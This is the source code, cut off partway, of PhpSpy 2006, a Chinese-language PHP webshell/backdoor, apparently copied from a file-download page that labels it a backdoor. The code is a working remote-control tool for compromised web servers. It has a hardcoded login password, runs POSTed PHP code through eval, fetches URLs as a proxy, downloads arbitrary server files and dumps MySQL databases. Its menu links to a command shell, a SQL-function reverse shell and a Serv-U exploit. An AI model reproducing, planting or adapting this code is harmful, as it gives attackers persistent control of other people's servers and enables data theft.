<?php
/**
--------------------------------------------------------------------------------
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";
// 如果需要密码验证,请修改登陆密码
$admin['pass'] = "7758521chang";
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no)
$retime = "no";
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定)
$cmd = "cmd.exe";
// 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~
//$notice = "[<a href=\"http://www.51shell.cn\" title=\"浅蓝的辐射鱼\">Saiy</a>] [<a href=\"http://www.4gnel.net\" title=\"安全天使\">S4T</a>] [<a href=\"http://1v1.name\" title=\"7jdg\">7jdg</a>]<br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为,否则后果自负!</font>";
$notice = "[<a href=\"http://www.kjsc.com.cn\" title=\"浅蓝的辐射鱼\">Saiy</a>] [<a href=\"http://www.kjsc.com.cn\" title=\"安全天使\">S4T</a>] [<a href=\"http://www.kjsc.com.cn\" title=\"7jdg\">7jdg</a>]<br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为,否则后果自负!</font>";
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 >>></a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";
exit;
}
if($_GET['action'] == "nowuser") {
$user = get_current_user();
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!";
echo"当前进程用户名:$user";
exit;
}
if(isset($_POST['phpcode'])){
eval("?".">$_POST[phpcode]<?");
exit;
}
// HUI20.CN
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
exit;
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">注册表操作</a>" : "";
$tb = new FORMS;
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>http://<? echo $_SERVER['HTTP_HOST'];?> PhpSpy 2006 修改版</title>
<style type="text/css">
body{
BACKGROUND-COLOR: #F5F5F5;
COLOR: #3F3849;
font-family: "Verdana", "Tahoma", "宋体";
font-size: "12px";
line-height: "140%";
}
TD {FONT-FAMILY: "Verdana", "Tahoma", "宋体"; FONT-SIZE: 12px; line-height: 140%;}
.smlfont {
font-family: "Verdana", "Tahoma", "宋体";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#CA0000";
}
A:LINK {COLOR: #3F3849; TEXT-DECORATION: none}
A:VISITED {COLOR: #3F3849; TEXT-DECORATION: none}
A:HOVER {COLOR: #FFFFFF; BACKGROUND-COLOR: #cccccc}
A:ACTIVE {COLOR: #FFFFFF; BACKGROUND-COLOR: #cccccc}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function really(d,f,m,t) {
if (confirm(m)) {
if (t == 1) {
window.location.href='?dir='+d+'&deldir='+f;
} else {
window.location.href='?dir='+d+'&delfile='+f;
}
}
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$test = "";
if(!$_GET['dir']) $dir = "./";
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
$tb->tdbody('| <a href="?action=logout">注销登录</a> | <a href="?action=dir">Shell 目录</a> | <a href="?action=phpenv">环境变量</a> | <a href="?action=proxy">HUI20.CN</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | ');
$tb->tdbody('| <a href="?action=downloads">Http 文件下载</a> | <a href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval">执行php脚本</a> | <a href="?action=sql">执行SQL语句</a> | <a href="?action=sql&type=fun">Func反弹Shell</a> | <a href="?action=sqlbak">MySQL Backup</a> | <a href="?action=SUExp">Serv-U EXP</a> |');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->make
一款php后门 phpspy
4星 · 超过85%的资源 需积分: 50 54 浏览量
2007-10-29
09:31:47
上传
评论
收藏 18KB RAR 举报
jinzhai
- 粉丝: 44
- 资源: 9
- 1
- 2
前往页